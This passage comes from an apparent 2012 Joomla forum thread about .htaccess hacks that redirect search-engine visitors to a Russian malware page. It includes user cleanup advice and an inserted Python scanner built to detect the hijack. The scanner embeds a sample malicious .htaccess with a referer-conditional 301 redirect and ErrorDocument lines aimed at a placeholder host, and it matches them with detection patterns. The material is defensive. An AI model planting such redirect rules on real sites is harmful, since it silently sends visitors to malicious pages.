8) Call your server ISP after you have cleared everything, and ask them to recheck the upper root directory to make sure the corrupted .htaccess file has not been reactivated (if you are on shared hosting)

It took me three attempts... to make sure i cleared all the .htaccess files... if you leave one you leave yourself open...

I do not know if other ISP are being affected -

Time Investment to fix:: 9am to 7:43 --- All Day
& 4 calls to godaddy - They were very helpful.

Good Luck!!!
Last edited by PhilD on Sun Apr 22, 2012 11:59 pm, edited 4 times in total.
Reason: broke link and snipped code - again, removed solved marker, retitled [PhilD wrote - turned off url parsing for post]
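The two .htaccess fragments quoted in this thread share one shape: a RewriteCond on the Referer that matches search-engine names, a RewriteRule that 301-redirects off-site, and ErrorDocument directives pointing at the same external host. As an added example (not code from the thread or from any Joomla project), the scanner below walks the site root and its first-level directories, which is where the posts above found the hijack, and reports any directive that sends visitors to a host other than the site's own. The hostnames in LOCAL_HOSTS and both sample files are constructed; pin-se.xx is the thread's own placeholder.

```python
"""Scan .htaccess files for the referer-conditional redirect and ErrorDocument
hijack quoted in the thread.

Added example (not the thread's or any Joomla project's code). The hostnames in
LOCAL_HOSTS and the sample files below are constructed placeholders.
"""
import os
import re
from urllib.parse import urlsplit

LOCAL_HOSTS = {'www.example.com', 'example.com'}  # placeholder: the site's own names

DIRECTIVE_RE = re.compile(
    r'^\s*(RewriteCond|RewriteRule|ErrorDocument|Redirect(?:Match)?)\s+(.*)$', re.I)
REFERER_RE = re.compile(r'%\{HTTP_REFERER\}', re.I)
SEARCH_ENGINE_RE = re.compile(r'google|yahoo|bing|ask|baidu|web-archiv', re.I)

# Constructed samples: the first mirrors the hijack from the post (pin-se.xx is
# the thread's own placeholder), the second is the kind of rule Joomla's
# htaccess.txt ships with and must not be flagged.
MALICIOUS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo||web-archiv)\\.(.*)
RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L]
</IfModule>
ErrorDocument 404 http://pin-se.xx/acu?11
ErrorDocument 500 http://pin-se.xx/acu?11
"""
CLEAN = """\
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule .* index.php [L]
ErrorDocument 404 /index.php?option=com_content&view=article&id=404
"""


def external_host(target):
    """Host of an absolute http(s) URL that is not one of ours, else None."""
    parts = urlsplit(target.strip())
    if parts.scheme in ('http', 'https') and parts.hostname:
        if parts.hostname not in LOCAL_HOSTS:
            return parts.hostname
    return None


def scan_htaccess_text(text):
    """Return (line_no, description) for each directive that sends visitors off-site."""
    findings = []
    referer_cond = False  # a Referer-based RewriteCond is pending for the next RewriteRule
    for n, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE_RE.match(line)
        if not m:
            continue
        directive, tokens = m.group(1).lower(), m.group(2).split()
        if directive == 'rewritecond':
            args = m.group(2)
            referer_cond = referer_cond or bool(
                REFERER_RE.search(args) and SEARCH_ENGINE_RE.search(args))
            continue
        if directive == 'rewriterule':
            host = external_host(tokens[1]) if len(tokens) > 1 else None
            if host and referer_cond:
                findings.append((n, 'redirect to ' + host + ' only for search-engine referrals'))
            elif host:
                findings.append((n, 'rewrite to external host ' + host))
            referer_cond = False  # conditions apply to one RewriteRule only
        elif directive == 'errordocument':
            host = external_host(tokens[1]) if len(tokens) > 1 else None
            if host:
                findings.append((n, 'ErrorDocument ' + tokens[0] + ' sends visitors to ' + host))
        else:  # Redirect / RedirectMatch: the target is the last argument
            host = external_host(tokens[-1]) if tokens else None
            if host:
                findings.append((n, directive + ' to external host ' + host))
    return findings


def scan_site(root, max_depth=1):
    """Scan root/.htaccess and the .htaccess of directories up to max_depth levels down.

    The posts report the hijack only in Joomla's first-level directories, hence
    the default of 1; raise it to sweep the whole tree.
    """
    results = {}
    root = os.path.abspath(root)
    for dirpath, dirnames, filenames in os.walk(root):
        depth = dirpath[len(root):].count(os.sep)
        if depth >= max_depth:
            dirnames[:] = []  # do not descend any further
        if '.htaccess' in filenames:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = scan_htaccess_text(fh.read())
            if hits:
                results[path] = hits
    return results


if __name__ == '__main__':
    for line_no, what in scan_htaccess_text(MALICIOUS):
        print(f'line {line_no}: {what}')
```

Because the redirect only fires on search-engine referrals, the site owner who opens it from a bookmark sees nothing wrong, which is exactly the symptom reported further down this thread; scanning the files directly does not depend on how the page is reached.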

HollyK
Joomla! Fledgling
Posts: 2
Joined: Sun Apr 22, 2012 11:54 pm

Re: Joomla .htaccess hacked to xxx.ru

Post by HollyK » Mon Apr 23, 2012 12:03 am

Similar thing has happened to my site.
The site appeared fine to me as I always had it bookmarked and went straight to it via that, but it was brought to my attention by a member who googled my site and entered via its Google link... or should I say tried to enter. Upon clicking the Google listing for my site it took him to a Russian page whereupon it tried to begin installing a trojan.

I contacted my hosting company and they immediately did a clean install... wiped everything.
I did have a backup but unfortunately when I installed it using Kickstart (great app btw) the same thing happened.
The hosting company did another clean install.

So I have now run the backup on my local machine and everything appears fine as it did before, though the problem is obviously that when it's set live the same thing will probably happen when someone googles my site and enters that way.

What can I do to find the malicious code now that I have it running via XAMPP on my local machine?

PS: I looked over the htaccess file and it doesn't appear to have anything out of the ordinary in it.

Thanks in advance.
HK

